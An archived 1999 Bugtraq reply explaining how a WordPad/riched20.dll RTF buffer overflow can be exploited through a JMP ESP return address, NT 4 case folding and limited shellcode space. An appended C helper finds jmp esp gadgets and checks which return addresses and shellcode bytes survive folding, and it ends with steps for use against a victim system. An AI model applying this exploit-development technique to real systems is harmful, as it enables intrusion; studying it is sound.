Bugtraq mailing list archives
Re: WordPad/riched20.dll buffer overflow
From: mnemonix () GLOBALNET CO UK (Mnemonix)
Date: Sat, 20 Nov 1999 00:43:26 -0000
----- Original Message -----
From: "Gerardo Richarte" <core.lists.bugtraq () CORE-SDI COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Thursday, November 18, 1999 9:45 PM
Subject: Re: WordPad/riched20.dll buffer overflow

> <SNIP>
> I've been trying to determine if it's exploitable, and couldn't reproduce
> what you described. I want to know if there is some other information I
> need to know... here is what I tried: an rtf file with {\rtf\AAAAAAAAA...}
> a lot of As (tried 32, 49, 1000, 2000, ... 5000 ... 20000)
> <SNIP>
> Could anybody reproduce this bug?
This is exploitable. On both Windows NT 4 and Windows 2000 the payload can be found at the ESP, but there is a difference between the two OSs. NT 4 seems to do a tolower() on the string, turning "AAAA" into "aaaa", whereas Windows 2000 preserves the case. Both OSs have the return address overwritten, so all you have to do is find an instruction in the memory space that does a JMP ESP; there are quite a few floating around the place.

On NT 4, if any of the bytes of the exploit code or return address are < 0x61 then they'll be turned into the uppercase version, i.e. 0x41 -> 0x61, so anyone writing an exploit for NT will have to be cunning. On Win2K there is not this problem.

For both OSs, from the ESP you'll get around 152 bytes of room to put your exploit code in.

For anyone interested in NT buffer overruns, some useful docs on the subject can be found at http://www.infowar.co.uk/mnemonix

Cheers,
David Litchfield
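The two practical problems the message above raises are locating a JMP ESP to use as the return address and making sure neither that address nor the code after it is damaged by the case folding seen on NT 4. The following is an added example, not code from the original post or from its author; it scans a constructed stand-in for a module's code bytes for the x86 opcode sequence FF E4 (jmp esp) and models the folding as a C-locale tolower(), which only rewrites 0x41..0x5A ('A'..'Z') to 0x61..0x7A. The sample image bytes and the two candidate addresses 0x77E4F3A1 and 0x7800415A are constructed for illustration, not taken from any real riched20.dll or system DLL.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* x86 "jmp esp" encodes as FF E4. Scan a code image for every occurrence and
 * record the offsets; the caller adds the module's load address to each.
 * Returns the total number found, even if more than max_out fit in out[]. */
size_t find_jmp_esp(const uint8_t *code, size_t len, size_t *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        if (code[i] == 0xFF && code[i + 1] == 0xE4) {
            if (n < max_out)
                out[n] = i;
            n++;
        }
    }
    return n;
}

/* Model the case folding the post attributes to NT 4 as a C-locale tolower():
 * 0x41..0x5A ('A'..'Z') become 0x61..0x7A, every other byte is left alone.
 * Writes the folded copy to out and returns how many bytes changed, so a
 * result of 0 means the bytes would reach the stack intact. */
size_t fold_like_nt4(const uint8_t *in, uint8_t *out, size_t len)
{
    size_t changed = 0;
    for (size_t i = 0; i < len; i++) {
        out[i] = (in[i] >= 'A' && in[i] <= 'Z') ? (uint8_t)(in[i] + 0x20) : in[i];
        if (out[i] != in[i])
            changed++;
    }
    return changed;
}

/* Apply the same check to a little-endian 32-bit return address and return
 * how many of its four bytes the folding would alter. */
size_t folded_bytes_in_addr(uint32_t addr)
{
    uint8_t le[4] = {
        (uint8_t)(addr & 0xFF), (uint8_t)((addr >> 8) & 0xFF),
        (uint8_t)((addr >> 16) & 0xFF), (uint8_t)((addr >> 24) & 0xFF)
    };
    uint8_t tmp[4];
    return fold_like_nt4(le, tmp, 4);
}

int main(void)
{
    /* Constructed stand-in for a few bytes of a loaded module, not a real dump. */
    static const uint8_t image[] = {
        0x55, 0x8B, 0xEC, 0xFF, 0xE4, 0x90, 0x90, 0xC3, 0xFF, 0xE4, 0xCC
    };
    size_t offs[8];
    size_t n = find_jmp_esp(image, sizeof image, offs, 8);
    printf("%zu jmp esp candidate(s)\n", n);
    for (size_t i = 0; i < n && i < 8; i++)
        printf("  image+0x%zx\n", offs[i]);

    /* Two hypothetical addresses: the first survives folding, the second does not. */
    printf("0x77E4F3A1 -> %zu byte(s) altered\n", folded_bytes_in_addr(0x77E4F3A1));
    printf("0x7800415A -> %zu byte(s) altered\n", folded_bytes_in_addr(0x7800415A));

    /* The "AAAA" -> "aaaa" behaviour described for NT 4. */
    uint8_t folded[4];
    size_t c = fold_like_nt4((const uint8_t *)"AAAA", folded, 4);
    printf("\"AAAA\" -> \"%.4s\" (%zu changed)\n", folded, c);

    /* Why the exploit writer has to be cunning: "xor eax,eax ; push eax" is
     * 31 C0 50, and 0x50 is 'P', so push eax would become 0x70 (jo rel8). */
    const uint8_t stub[3] = { 0x31, 0xC0, 0x50 };
    uint8_t stub_folded[3];
    printf("31 C0 50 -> %zu byte(s) altered\n", fold_like_nt4(stub, stub_folded, 3));
    return 0;
}
```

To use this against a real target you would run find_jmp_esp over the bytes of a DLL that is loaded at a fixed address on the victim system, add the load address to each offset, and reject any candidate for which folded_bytes_in_addr returns non-zero on NT 4; the same filter applied to the shellcode tells you which instructions (anything whose encoding contains 0x41..0x5A) need to be rewritten.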